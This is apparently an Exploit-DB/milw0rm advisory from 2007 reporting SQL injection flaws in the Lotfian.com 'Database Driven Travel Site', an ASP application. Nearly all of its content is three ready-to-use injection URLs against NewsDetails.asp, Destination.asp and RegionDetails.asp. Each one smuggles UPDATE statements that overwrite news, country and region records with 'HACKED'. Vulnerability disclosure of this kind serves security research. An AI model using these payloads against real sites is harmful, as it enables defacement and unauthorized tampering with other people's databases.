Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection

EDB-ID:

4710

CVE:





Platform:

PHP

Date:

2007-12-10


Aria-Security Team
http://Aria-Security.Net
-----------------------------
DATABASE DRIVEN TRAVEL SITE
Vendor: Lotfian.com

NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE gtsNews set NewsTitle='HACKED'

Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'

RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--

# milw0rm.com [2007-12-10]